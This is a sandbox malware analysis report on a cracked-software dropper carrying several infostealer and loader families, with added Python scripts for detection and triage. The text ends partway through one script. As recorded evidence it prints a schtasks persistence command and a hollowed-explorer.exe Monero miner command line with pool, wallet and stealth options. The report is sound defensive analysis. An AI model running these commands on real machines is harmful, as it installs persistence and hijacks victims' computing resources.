Malware Analysis Report

2024-11-13 16:52

Sample ID 241108-2egzgazraz
Target 813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46
SHA256 813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46
Tags
azorult discovery infostealer trojan fabookie ffdroider gcleaner onlylogger evasion loader spyware stealer pony collection credential_access rat privateloader
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral4, behavioral5, behavioral8, behavioral9, behavioral12, behavioral1, behavioral3, behavioral6, behavioral7, behavioral10, behavioral11, behavioral2 (each: Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46

Threat Level: Known bad

The file 813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46 was found to be: Known bad.

Malicious Activity Summary


FFDroider

Ffdroider family

Pony,Fareit

Fabookie family

Pony family

Azorult family

Azorult

Onlylogger family

Detect Fabookie payload

Fabookie

Gcleaner family

Privateloader family

GCleaner

PrivateLoader

OnlyLogger

FFDroider payload

OnlyLogger payload

Executes dropped EXE

Loads dropped DLL

Reads data files stored by FTP clients

Unsecured Credentials: Credentials In Files

Deletes itself

Reads user/profile data of web browsers

Checks computer location settings

Looks up external IP address via web service

Accesses Microsoft Outlook accounts

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Checks whether UAC is enabled

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in Windows directory

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

Unsigned PE

Program crash

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

outlook_win_path

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Scheduled Task/Job: Scheduled Task

Runs ping.exe

Checks SCSI registry key(s)

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 22:29

Signatures

Azorult family

azorult

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A (x5, no indicator details recorded for the static matches)

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

134s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/4376-0-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2264 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe (x4)

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104977 0

(The dropped copy is started with a command line whose first token is the original's path, followed by 1731104977, a Unix timestamp equal to 2024-11-08 22:29:37 UTC, i.e. the detonation time. Since the "Deletes itself" hit above is attributed to winnetdriv.exe, this is consistent with the copy removing the original whose path it was handed: the usual copy-to-%WINDIR%, relaunch, delete-dropper install pattern.)

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.wpdsfds23x.com udp

Files

memory/2264-0-0x0000000000360000-0x0000000000445000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

memory/2776-12-0x00000000000F0000-0x00000000001D5000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

FFDroider payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4768 set thread context of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A (x2)
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A (x2)
N/A N/A C:\Windows\explorer.exe N/A (x54)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A (x5)
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A (x2)

(SeLockMemoryPrivilege is the large-pages privilege that XMRig-compatible RandomX miners request at start-up; a genuine explorer.exe has no reason to enable it, and the process list below shows this explorer.exe carrying miner arguments.)

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4804 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe (x3)
PID 2208 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe (x3)
PID 4804 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe (x3)
PID 3944 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe (x2)
PID 3944 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe (x2)
PID 3944 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe (x2)
PID 3944 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe (x3)
PID 3944 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe (x2)
PID 4804 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe (x3)
PID 1772 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe (x2)
PID 2248 wrote to memory of 1680 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe (x2)
PID 1772 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe (x2)
PID 4804 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe (x3)
PID 4804 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe (x2)
PID 4804 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe (x3)
PID 4768 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\System32\cmd.exe (x2)
PID 4768 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe (x2)
PID 3576 wrote to memory of 2484 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe (x2)
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe (x15)

Uses Task Scheduler COM API

persistence
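The WriteProcessMemory and SetThreadContext rows above are enough to rebuild the delivery chain and single out the one genuine injection. Added by the editor as a worked example; this is not the sandbox's own logic, and the rows embedded in it are copied from the tables above (one header line included to show how non-rows are skipped). In this sandbox's output, a parent writing into a freshly created child is itself reported as WriteProcessMemory, so the graph doubles as the process tree; only the edge that also carries SetThreadContext is the create-suspended / write / set-context hollowing sequence. Nodes are keyed by (PID, image) rather than PID alone because PID 1772 is first chrome3.exe and later sihost64.exe. The user-writable path markers and the "system image" test are the editor's assumptions.

```python
"""Process-tree / injection graph from flattened sandbox signature rows.
Editor's example, not part of the report.  Assumes the report's row layout:
'PID <src> <op> <dst> N/A <src image> <dst image>' with .exe images."""
import re

ROW = re.compile(
    r"^PID (\d+) (wrote to memory of|set thread context of) (\d+) N/A (.+?\.exe) (.+?\.exe)$",
    re.IGNORECASE,
)
# Directories a standard user can write to (editor's list; extend as needed).
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")


def is_user_writable(path):
    low = path.lower()
    return any(marker in low for marker in USER_WRITABLE)


def is_system_image(path):
    return path.lower().startswith("c:\\windows\\")


class InjectionGraph:
    """Nodes are (pid, image) pairs: Windows recycles PIDs once a process exits,
    so a bare PID would merge two different processes.  Each edge records the
    set of operations seen and how many rows contributed to it."""

    def __init__(self):
        self.edges = {}  # (src_node, dst_node) -> {"ops": set, "count": int}

    def add(self, src, dst, op):
        entry = self.edges.setdefault((src, dst), {"ops": set(), "count": 0})
        entry["ops"].add(op)
        entry["count"] += 1

    @property
    def nodes(self):
        found = set()
        for src, dst in self.edges:
            found.update((src, dst))
        return found

    def parent(self, node):
        """First node that wrote into `node`: its creator in a CreateProcess tree."""
        for src, dst in self.edges:
            if dst == node:
                return src
        return None


def parse_rows(rows):
    """Build the graph; rows that do not match the layout are counted and skipped."""
    graph, skipped = InjectionGraph(), 0
    for row in rows:
        m = ROW.match(row.strip())
        if not m:
            skipped += 1
            continue
        src_pid, op, dst_pid, src_img, dst_img = m.groups()
        graph.add((int(src_pid), src_img), (int(dst_pid), dst_img), op.lower())
    return graph, skipped


def lineage(graph, node):
    """Image paths from the root of the tree down to `node`."""
    chain, seen = [node], {node}
    while True:
        parent = graph.parent(chain[0])
        if parent is None or parent in seen:  # root reached, or a cycle
            break
        chain.insert(0, parent)
        seen.add(parent)
    return [img for _, img in chain]


def hollowing_candidates(graph):
    """Edges where a process from a user-writable directory wrote into AND reset
    the thread context of a process whose image lives under the Windows directory."""
    hits = []
    for (src, dst), entry in graph.edges.items():
        if ("set thread context of" in entry["ops"]
                and is_user_writable(src[1]) and is_system_image(dst[1])):
            hits.append({"src": src, "dst": dst,
                         "ops": sorted(entry["ops"]), "count": entry["count"]})
    return hits


# Rows copied from the behavioral8 signature tables (duplicates kept on purpose).
SAMPLE_ROWS = [
    r"PID 4804 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe",
    r"PID 4804 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe",
    r"PID 4804 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe",
    r"PID 3944 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe",
    r"PID 1772 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe",
    r"PID 2248 wrote to memory of 1680 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe",
    r"PID 1772 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe",
    r"PID 4768 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe",
    r"PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe",
    r"PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe",
    r"PID 4768 set thread context of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe",
    "Description Indicator Process Target",  # table header, not a row: skipped
]

if __name__ == "__main__":
    graph, skipped = parse_rows(SAMPLE_ROWS)
    print(" -> ".join(lineage(graph, (4092, r"C:\Windows\explorer.exe"))))
    for hit in hollowing_candidates(graph):
        print("hollowing candidate:", hit)
```

On these rows the lineage of the explorer.exe node is keygen-step-4.exe, PBrowFile28.exe, chrome3.exe, services64.exe, explorer.exe, and the only hollowing candidate is the services64.exe to explorer.exe edge; the cmd.exe and schtasks.exe edges are ordinary process creation and are not flagged.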

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 788

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1012

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1136

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1392

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 544 -ip 544

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 544 -s 352

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

(This is the explorer.exe instance that services64.exe wrote into and reset the thread context of (PID 4768 to 4092 in the signatures above), i.e. a hollowed system binary. The arguments are an XMRig-compatible RandomX (rx/0) Monero miner configuration: a nanopool pool over TLS on port 14433, a 95-character Monero payout address with a worker suffix, a CPU-thread cap, idle-only mining and a stealth flag. The legitimate explorer.exe never takes command-line switches of this shape.)

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1148
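Three things in the process list above are worth turning into reusable checks: the schtasks persistence that runs an AppData binary at logon with the highest run level, the system-binary lookalike names (services64.exe, sihost64.exe) living outside the Windows directory, and a system image (explorer.exe) carrying miner switches. Added by the editor as a worked example, not the sandbox's or any vendor's detection code. The command lines embedded below are copied from this report; the rule names, the system-name and miner-flag lists, the user-writable path markers and the three-flag threshold are the editor's assumptions.

```python
"""Command-line triage rules over the behavioral8 process list.
Editor's example, not part of the report."""
import re

# Windows-style tokenizer: keeps "double" and 'single' quoted runs together.
_TOKEN = re.compile(r'''"[^"]*"|'[^']*'|\S+''')
# Names borrowed for lookalikes (services64.exe, sihost64.exe) or hollowed
# (explorer.exe).  Editor's list, not exhaustive.
SYSTEM_NAMES = {"explorer", "svchost", "services", "sihost", "lsass", "csrss",
                "winlogon", "dllhost", "conhost", "runtimebroker"}
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")
# Switch prefixes of XMRig-compatible miners (editor's list).
MINER_FLAGS = ("--algo", "--url", "--user", "--pass", "--tls", "--randomx-",
               "--cinit-", "--cpu-max-threads-hint", "--cuda-")
MONERO_ADDR = re.compile(r"4[1-9A-HJ-NP-Za-km-z]{94}")  # 95-char base58 mainnet address


def tokenize(cmdline):
    return [t.strip("\"'") for t in _TOKEN.findall(cmdline)]


def image_path(cmdline):
    tokens = tokenize(cmdline)
    return tokens[0] if tokens else ""


def image_stem(cmdline):
    """Lower-cased basename without .exe and trailing digits: services64 -> services."""
    base = image_path(cmdline).replace("/", "\\").rsplit("\\", 1)[-1].lower()
    base = base[:-4] if base.endswith(".exe") else base
    return base.rstrip("0123456789")


def _value_after(tokens, switch):
    low = [t.lower() for t in tokens]
    if switch in low and low.index(switch) + 1 < len(tokens):
        return tokens[low.index(switch) + 1]
    return None


def check_schtasks(cmdline):
    """schtasks /create whose action (/tr) runs from a user-writable path."""
    tokens = tokenize(cmdline)
    low = [t.lower() for t in tokens]
    if not any(t in ("schtasks", "schtasks.exe") or t.endswith("\\schtasks.exe") for t in low):
        return None
    if "/create" not in low:
        return None
    target = _value_after(tokens, "/tr")
    if target is None or not any(m in target.lower() for m in USER_WRITABLE):
        return None
    return {"rule": "schtasks_persistence_userdir",
            "task": _value_after(tokens, "/tn"), "target": target,
            "trigger": (_value_after(tokens, "/sc") or "").lower(),
            "elevated": (_value_after(tokens, "/rl") or "").lower() == "highest"}


def check_miner(cmdline):
    """Three or more miner switches; extracts pool, wallet and whether the host image is a system name."""
    tokens = tokenize(cmdline)
    if len([t for t in tokens if t.lower().startswith(MINER_FLAGS)]) < 3:
        return None
    kv = {}
    for t in tokens:
        if t.startswith("--") and "=" in t:
            key, value = t[2:].split("=", 1)
            kv[key.lower()] = value.strip("\"'")
    host, _, port = kv.get("url", "").rpartition(":")
    wallet = kv.get("user", "").split(".")[0]  # nanopool style: <address>.<worker>/<email>
    return {"rule": "xmrig_style_miner", "image": image_path(cmdline),
            "pool_host": host, "pool_port": int(port) if port.isdigit() else None,
            "algo": kv.get("algo"), "wallet": wallet,
            "monero_address": bool(MONERO_ADDR.fullmatch(wallet)),
            "tls": "--tls" in tokens,
            "stealth": any(t.startswith("--cinit-stealth") for t in tokens),
            "hosted_in_system_image": image_stem(cmdline) in SYSTEM_NAMES}


def check_lookalike(cmdline):
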